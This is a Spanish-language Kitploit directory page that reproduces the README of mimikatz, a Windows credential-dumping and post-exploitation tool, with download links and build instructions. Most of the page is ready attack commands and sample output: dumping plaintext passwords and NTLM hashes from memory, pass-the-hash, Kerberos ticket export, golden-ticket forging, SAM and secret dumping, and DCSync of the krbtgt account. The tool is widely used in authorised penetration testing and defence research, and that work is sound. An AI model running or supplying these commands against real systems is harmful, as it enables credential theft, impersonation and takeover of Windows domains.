Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
mimikatz — Una pequeña herramienta para jugar con la seguridad de Windows | Kitploit
Herramientas/GitHubGitHub/gentilkiwi/mimikatz
Descifrado de ContraseñasFrameworks de Pruebas de PenetraciónFrameworks de ExploitsAtaques de ContraseñasMecanismos de PersistenciaExplotaciónAnálisis de HashMovimiento LateralPost-ExplotaciónPruebas de PenetraciónAutenticación
21.8k4.2k83hace 5 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Red Teaming
Desarrollo de Payloads
Top en Explotación #12
Top en Frameworks de Exploits #15
Top en Análisis de Hash #20
Top en Movimiento Lateral #20
Top en Ataques de Contraseñas #9
Top en Descifrado de Contraseñas #9
Top en Frameworks de Pruebas de Penetración #15
Top en Mecanismos de Persistencia #11
Top en Post-Explotación #3
Top en Red Teaming #10
GitHubgentilkiwi/mimikatz

mimikatz

Una pequeña herramienta para jugar con la seguridad de Windows

Ver RepositorioSitio web

mimikatz

mimikatz es una herramienta que creé para aprender C y hacer algunos experimentos con la seguridad de Windows.

Ahora es bien conocida por extraer contraseñas en texto plano, hashes, códigos PIN y tickets de Kerberos de la memoria. mimikatz también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.

root@kitploit:~
  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  13 modules * * */


mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

¡Pero eso no es todo! Crypto, Terminal Server, Events, ... mucha información en la Wiki de GitHub https://github.com/gentilkiwi/mimikatz/wiki o en https://blog.gentilkiwi.com (en francés, sí).

Si no quieres compilarlo, los binarios están disponibles en https://github.com/gentilkiwi/mimikatz/releases

Uso rápido

root@kitploit:~
log
privilege::debug

sekurlsa

root@kitploit:~
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

root@kitploit:~
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

root@kitploit:~
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault y lsadump

root@kitploit:~
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Compilación

mimikatz se presenta en forma de una solución de Visual Studio y un controlador WinDDK (opcional para operaciones principales), por lo que los requisitos previos son:

  • para mimikatz y mimilib : Visual Studio 2010, 2012 o 2013 para escritorio (2013 Express para escritorio es gratuito y soporta x86 y x64 - http://www.microsoft.com/download/details.aspx?id=44914)
  • para mimikatz driver, mimilove (y la plataforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800

mimikatz utiliza SVN para el control de versiones, ¡pero ahora también está disponible con GIT! Puedes usar cualquier herramienta que desees para sincronizar, incluso el GIT incorporado en Visual Studio 2013 =)

¡Sincroniza!

  • La URL de GIT es: https://github.com/gentilkiwi/mimikatz.git
  • La URL de SVN es: https://github.com/gentilkiwi/mimikatz/trunk
  • El archivo ZIP es: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Compilar la solución

  • Después de abrir la solución, Build / Build Solution (puedes cambiar la arquitectura)
  • ¡mimikatz ya está compilado y listo para usar! (Win32 / x64 incluso ARM64 si tienes suerte)
    • Puede aparecer el error MSB3073 relacionado con _build_.cmd y mimidrv, esto se debe a que el controlador no se puede compilar sin Windows Driver Kit 7.1 (WinDDK), pero mimikatz y mimilib funcionan correctamente.

ddk2003

Con esta plataforma opcional de MSBuild, puedes usar las herramientas de compilación de WinDDK y el runtime predeterminado msvcrt (binarios más pequeños, sin dependencias).

Para esta plataforma opcional, son obligatorios Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 y Visual Studio 2010, incluso si planeas usar Visual Studio 2012 o 2013 más tarde.

Sigue las instrucciones:

  • https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
  • https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Integración Continua

El proyecto mimikatz está disponible en AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz

Su estado es: AppVeyor CI status

Licencia

Licencia CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/

mimikatz necesita café para ser desarrollado:

  • PayPal: https://www.paypal.me/delpy/

Autor

  • Benjamin DELPY gentilkiwi, puedes contactarme en Twitter ( @gentilkiwi ) o por correo electrónico ( benjamin [at] gentilkiwi.com )
  • Las funciones DCSync y DCShadow en el módulo lsadump fueron coescritas con Vincent LE TOUX, puedes contactarlo por correo electrónico ( vincent.letoux [at] gmail.com ) o visitar su sitio web ( http://www.mysmartlogon.com )

Este es un desarrollo personal, por favor respeta su filosofía y no lo uses para cosas malas.

Descargar herramienta